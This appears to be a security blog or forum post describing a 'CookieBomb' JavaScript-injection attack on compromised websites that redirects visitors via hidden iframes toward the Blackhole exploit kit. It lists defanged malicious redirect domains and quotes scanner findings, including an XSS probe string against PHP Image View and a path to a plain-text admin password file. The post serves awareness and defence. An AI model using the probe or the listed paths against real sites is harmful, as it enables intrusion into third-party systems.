called this as #CookieBomb attack, it uses the obfuscation JavaScript to burp the hidden redirection via IFRAME and the cookie condition to be used as a ticket for malware infection further maliciousre direction
Yep Pondus, only the very top dogs like avast! webshield blocks it right away as the javascrript code. The others get it in a second stage as the malcode is trying to redirect for some proportion to Blackhole Exploit kit:
redirecting to malcode are…(info from the Malware Crusader at Malware Must Die)
h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/
This is combining the evils of PHP injection and javascript obfuscation. Always be aware of the 7 potentially insecure functions in javascript that could lead to malcode ->: escape(), eval(), link(), unescape(), exec(), search() combined with content as HTML tags, iframes, zero size iframes, lines and hyperlinks
Know the malcreant never rests, and malware should really be gone!
The attack is possible through website vulnerabilities, header gives away that IdeaWebServer/v0.80 is being used.
JS in every templates index.php file, read: http://forum.joomla.org/viewtopic.php?f=714&t=807708 (Matt Simonsen SRI hosting)
All sorts of variations are being made on this same theme.
Website and server admins should really start to harden their software and what is very important to check all input data to be verified. Here we can esatblish why that is: https://asafaweb.com/Scan?Url=www.polityczni.pl
while we see an excessive headers warning as configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks.
and a clickjacking warning as it appears no X-Frame-Options header was returned from the server which means that this website could be at risk of a clickjacking attack. With the exessive header information this attack as we found described in a Google pastebin cache could be performed against it:
Server: IdeaWebServer/v0.80
/cgibin/guestbook/passwd: GuestBook r4 from xxxxxxx.r2 dot ru stores the admin password in a plain text file.
/phpimageview.php?pic=javascript:alert(‘Vulnerable’): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. I won’t further dwell on this because it is beyond the scope of this post…
etc. etc.